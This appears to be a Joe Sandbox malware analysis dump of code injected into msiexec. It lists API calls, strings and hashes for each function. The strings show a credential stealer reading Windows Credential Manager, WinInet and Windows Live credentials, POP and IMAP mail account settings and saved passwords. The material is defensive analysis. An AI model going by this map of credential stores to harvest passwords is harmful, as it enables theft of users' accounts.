                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                            • API String ID: 2360744853-2229823034
                                                                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                            APIs
                                                                                                            • strchr.MSVCRT ref: 004100E4
                                                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                                                            • memset.MSVCRT ref: 00410129
                                                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                            • memset.MSVCRT ref: 00410171
                                                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                            • String ID: \systemroot
                                                                                                            • API String ID: 912701516-1821301763
                                                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                            APIs
                                                                                                            • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                            • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                            • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                            Strings
                                                                                                            • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                            • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                            • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                            • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                            • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                            • API String ID: 1640410171-2022683286
                                                                                                            • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                            • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                            • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                            • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                            • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                            • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$strlen
                                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                                            • API String ID: 2619041689-3408036318
                                                                                                            • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                            • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                            • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                            • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 667451143-3916222277
                                                                                                            • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                            • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                            • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                            • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                            APIs
                                                                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                            • wcslen.MSVCRT ref: 0040874A
                                                                                                            • wcsncmp.MSVCRT ref: 00408794
                                                                                                            • memset.MSVCRT ref: 0040882A
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                            • wcschr.MSVCRT ref: 0040889F
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                            • String ID: J$Microsoft_WinInet
                                                                                                            • API String ID: 3318079752-260894208
                                                                                                            • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                            • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                            • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                            • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004037EB
                                                                                                            • memset.MSVCRT ref: 004037FF
                                                                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                            • strchr.MSVCRT ref: 0040386E
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                            • strlen.MSVCRT ref: 00403897
                                                                                                            • sprintf.MSVCRT ref: 004038B7
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                            • String ID: %s@yahoo.com
                                                                                                            • API String ID: 2240714685-3288273942
                                                                                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 004108C3
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                            • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                            • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                            Strings
                                                                                                            • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                            • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeFromStringTaskUuidmemcpy
                                                                                                            • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                                                                                            • API String ID: 2208953623-202910704
                                                                                                            • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                                                                            • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                                                                                            • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                                                                                            • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                            • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                            • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                              • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                            • API String ID: 888011440-2039793938
                                                                                                            • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                            • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                            • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                            • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • database %s is already in use, xrefs: 0042E9CE
                                                                                                            • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                            • out of memory, xrefs: 0042EBEF
                                                                                                            • database is already attached, xrefs: 0042EA97
                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                            • unable to open database: %s, xrefs: 0042EBD6
                                                                                                            • too many attached databases - max %d, xrefs: 0042E951
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                            • API String ID: 1297977491-2001300268
                                                                                                            • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                            • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                            • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                            • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                            • strchr.MSVCRT ref: 0040327B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringstrchr
                                                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                            • API String ID: 1348940319-1729847305
                                                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                            • API String ID: 3510742995-3273207271
                                                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040F567
                                                                                                            • memset.MSVCRT ref: 0040F57F
                                                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 78143705-3916222277
                                                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                            APIs
                                                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                            • memset.MSVCRT ref: 0040FA1E
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                            • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                            • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                            • API String ID: 945165440-3589380929
                                                                                                            • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                            • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                            • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                            • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040F84A
                                                                                                            • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                            • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                            • String ID: Creds$ps:password
                                                                                                            • API String ID: 2290531041-1872227768
                                                                                                            • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                            • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                            • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                            • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                                            • String ID: %s@gmail.com
                                                                                                            • API String ID: 3902205911-4097000612
                                                                                                            • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                            • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                            • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                            • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004094C8
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                            • memset.MSVCRT ref: 0040950C
                                                                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                            • _strcmpi.MSVCRT ref: 00409531
                                                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                            • String ID: sysdatetimepick32
                                                                                                            • API String ID: 3411445237-4169760276
                                                                                                            • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                            • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403504
                                                                                                            • memset.MSVCRT ref: 0040351A
                                                                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                            • _mbscat.MSVCRT ref: 0040356D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                            • API String ID: 632640181-966475738
                                                                                                            • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                            • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                            • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                              • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                              • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                              • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                            • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
